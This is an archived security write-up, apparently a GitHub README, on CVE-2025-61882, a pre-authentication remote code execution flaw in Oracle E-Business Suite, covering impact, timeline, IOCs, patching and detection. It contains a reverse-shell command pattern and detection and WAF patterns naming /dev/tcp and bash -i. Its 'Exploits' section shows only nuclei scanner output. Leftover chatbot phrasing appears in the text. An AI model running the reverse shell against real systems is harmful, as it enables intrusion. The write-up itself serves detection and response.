POC详情: 47d21b13d53efec10a18357f99651ef765e74fae

来源
关联漏洞
标题: Oracle E-Business Suite 安全漏洞 (CVE-2025-61882)
描述:Oracle E-Business Suite是美国甲骨文(Oracle)公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。 Oracle E-Business Suite 12.2.3版本至12.2.14版本存在安全漏洞,该漏洞源于未经验证的攻击者可通过HTTP网络访问进行攻击,可能导致组件接管。
描述
CVE-2025-61882
介绍
# 🛡️🚨 CVE‑2025‑61882 — Critical Pre‑Auth Remote Code Execution in Oracle E‑Business Suite (EBS) 🚨🛡️

> Short summary: **Critical pre‑auth remote code execution** in **Oracle E‑Business Suite (EBS)** — affects 12.2.3 → 12.2.14, CVSS **9.8**, actively exploited in the wild (ransom/ extortion activity reported). ([oracle.com][1])

---

# 📌 Quick facts (table)

| Field                    | Details                                                                          |
| ------------------------ | -------------------------------------------------------------------------------- |
| 🆔 CVE                   | **CVE‑2025‑61882**                                                               |
| 🧾 Product / Component   | Oracle E‑Business Suite (EBS) — Concurrent Processing / BI Publisher integration |
| 📦 Affected versions     | **12.2.3 → 12.2.14**                                                             |
| 🔢 CVSS (v3.1)           | **9.8** (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)                                        |
| ⚠️ Type                  | Remote Code Execution (RCE) — **no authentication required**                     |
| 🔥 Exploited in the wild | **Yes** — mass exploitation / extortion campaigns reported                       |
| 📅 Disclosure / timeline | October 2025 (vendor advisory + public writeups). ([oracle.com][1])              |

*(Above consolidated from vendor advisory, NVD/CISA, and multiple vendor analyses.)* ([oracle.com][1])

---

# 💥 Impact (table)

| Impact area        | What it means                                                                  |
| ------------------ | ------------------------------------------------------------------------------ |
| 🔓 Confidentiality | Attackers can read sensitive HR/finance/ERP data                               |
| 🛠️ Integrity      | Attackers can modify records, create backdoors or alter configurations         |
| ⚡ Availability     | Attackers can disrupt services, execute ransomware or destroy backups          |
| 🧭 Risk level      | **Extreme** — pre‑auth RCE on critical ERP system → possible full domain pivot |

References reporting high‑impact exploitation and ransomware linkage. ([Rapid7][2])

---

# 🛠️ Technical summary (concise)

* **Vector:** HTTP/HTTPS requests to exposed EBS web endpoints trigger a vulnerability chain in the Concurrent Processing / BI Publisher integration leading to remote code execution. ([oracle.com][1])
* **Complexity:** Low (no authentication, no user interaction). ([nvd.nist.gov][3])
* **Observed payloads:** reverse shell patterns, web shells, dropped scripts used for data exfiltration and extortion. ([Rapid7][2])

---

# 🕵️‍♀️ Indicators of Compromise (IOCs) — examples (table)

> Oracle and incident responders published IOCs; below are representative examples reported in advisories and vendor writeups. Hunt for these patterns in logs and endpoints. ([oracle.com][1])

| Type               | Example                                                                                   |
| ------------------ | ----------------------------------------------------------------------------------------- |
| 🌐 IPs (observed)  | `200.107.207.26`, `185.181.60.11` (example addresses reported)                            |
| 🧾 Command pattern | `sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1` (reverse shell)                         |
| 🗂️ File hashes    | Several SHA‑256 hashes for suspected exploit scripts (see vendor advisory for full list)  |
| 🕳️ Artifacts      | Unexpected web shells, new cronjobs, suspicious outbound connections to unusual IPs/ports |

> If you want the **full IOC list** (IPs, full hashes, filenames) I can paste it here — say “paste IOCs”. (No links.)

---

# 🧭 Timeline (compact)

| Date               | Event                                                                                                                                         |
| ------------------ | --------------------------------------------------------------------------------------------------------------------------------------------- |
| Aug 9, 2025        | Earliest reported real‑world exploitation activity (vendor telemetry). ([crowdstrike.com][4])                                                 |
| Early Oct 2025     | Oracle issued security alert / patch availability for EBS. ([oracle.com][1])                                                                  |
| Oct 6–7, 2025      | CISA added the CVE to its Known Exploited Vulnerabilities (KEV) catalog (federal agencies guidance, due date for mitigation). ([cisa.gov][5]) |
| Oct 2025 (ongoing) | Multiple vendor writeups and mass‑exploit reports (CrowdStrike, Rapid7, Tenable, etc.). ([crowdstrike.com][4])                                |

---

# ✅ Immediate recommended actions (step table)

| Priority     |                                             Action | Notes / Sample specifics                                                                                                                                     |
| ------------ | -------------------------------------------------: | ------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| 1️⃣ Critical |                   **Patch** affected EBS instances | Apply Oracle’s Security Alert patches for versions 12.2.3–12.2.14 immediately. ([oracle.com][1])                                                             |
| 2️⃣ High     | **Isolate / restrict** access to EBS web endpoints | Block Internet‑facing HTTP/HTTPS to EBS; allow only trusted admin IPs or VPN.                                                                                |
| 3️⃣ High     |                        **Enable/adjust WAF rules** | Deploy vendor/community WAF signatures for the exploit patterns; block suspicious payloads. ([Rapid7][2])                                                    |
| 4️⃣ High     |                                  **Hunt & detect** | Search logs for reverse shell commands, abnormal file writes, and outbound connections to IOCs.                                                              |
| 5️⃣ Incident |          **Contain & respond** if compromise found | Isolate host, preserve forensic evidence, change credentials, rebuild from clean backups.                                                                    |
| 6️⃣ Policy   |                                **Report & notify** | If you’re in scope of regulatory/contractual requirements, notify stakeholders and authorities per policy (CISA/KEV guidance may apply). ([nvd.nist.gov][3]) |

---

# 💀 Exploits :

```yaml
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
```

<img width="1920" height="957" alt="CVE-2025-61882 Oracle E-Business Suite 1" src="https://github.com/user-attachments/assets/3cadb847-3c75-4ab3-b864-cff8920f72bf" />


<img width="1920" height="960" alt="CVE-2025-61882 Oracle E-Business Suite 4" src="https://github.com/user-attachments/assets/0a1c21b1-6976-4231-a852-87e2bac722af" />

---

# 🕵️‍♂️ Sample detection queries (copy/paste friendly)

**Splunk (search for reverse shell pattern):**

```
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw
```

**ELK / Kibana (KQL):**

```
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"
```

**Sigma rule (conceptual):**

```yaml
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection
```

*(Adjust field names to your log schema; use IOCs to refine.)*

---

# 🔐 Sample firewall / WAF mitigations (examples)

* **Network ACL:** Block inbound `80/443` to EBS servers from the public internet; allow only management VPN and specific admin IPs.
* **WAF rule (pseudo):** Block requests containing `bash -i`, `/dev/tcp/`, `base64 -d`, or typical exploit payload patterns in POST bodies or URL parameters.
* **Rate limiting / geo‑block:** Temporarily rate‑limit requests to EBS endpoints and block traffic from known malicious geographies if consistent with business needs.

---

# 🧾 Patch checklist (quick)

1. Take backups & snapshot VM images ✅
2. Test patch in staging (if possible) ✅
3. Apply Oracle Security Alert patch to EBS 12.2.3–12.2.14 ✅ (follow vendor steps: stop services, apply patch, run post‑install tasks) ([oracle.com][1])
4. Restart and validate service health ✅
5. Re‑scan for compromise artifacts and run full host forensic checks ✅

---

# 🧠 Threat actor / exploitation notes

* Multiple vendors attribute active exploitation to groups tied to extortion/ransomware (e.g., **Cl0p / Graceful Spider** or related actors) — used for data theft and extortion. Attribution confidence varies by vendor. ([crowdstrike.com][4])

---

# 📋 For SOC / IR teams — playbook checklist

* **Triage:** Inbound exploit attempt? Capture HTTP request, headers, POST body.
* **Contain:** Isolate affected host network.
* **Forensics:** Collect memory, disk image, web server logs, audit logs.
* **Remediate:** Rebuild host from clean image if compromise confirmed.
* **Recovery:** Restore from known‑good backups; rotate credentials.
* **Report:** Log incident, notify stakeholders, comply with KEV/CISA guidance if applicable. ([nvd.nist.gov][3])

---

# 🔎 Sources (short list of authoritative reporting)

*(I list sources for accuracy — I won’t paste links here but these are the vendor/authority names so you can reference them if needed.)*

* Oracle Security Alert / Patch Availability (vendor advisory). ([oracle.com][1])
* NVD / CISA (CISA KEV catalog entry and NVD metadata). ([nvd.nist.gov][3])
* CrowdStrike technical report on campaigns. ([crowdstrike.com][4])
* Rapid7 / Tenable / other vendor analyses and FAQs. ([Rapid7][2])

---

# Here’s a **professional, emoji-rich disclaimer** you can use for your CVE‑2025‑61882 report:

---

# ⚠️💀 Disclaimer 💀⚠️

The information provided in this report is **for awareness, defensive, and educational purposes only**.
Use of this information to exploit, attack, or compromise any system **without explicit authorization is illegal** and may result in **criminal and civil penalties**.

🔒 Always apply recommended patches, follow security best practices, and conduct testing **in controlled environments only**.

🧾 This report **does not replace official vendor advisories** — always consult Oracle Security Alerts and authorized guidance for definitive remediation instructions.

---
文件快照

[4.0K] /data/pocs/47d21b13d53efec10a18357f99651ef765e74fae └── [ 13K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。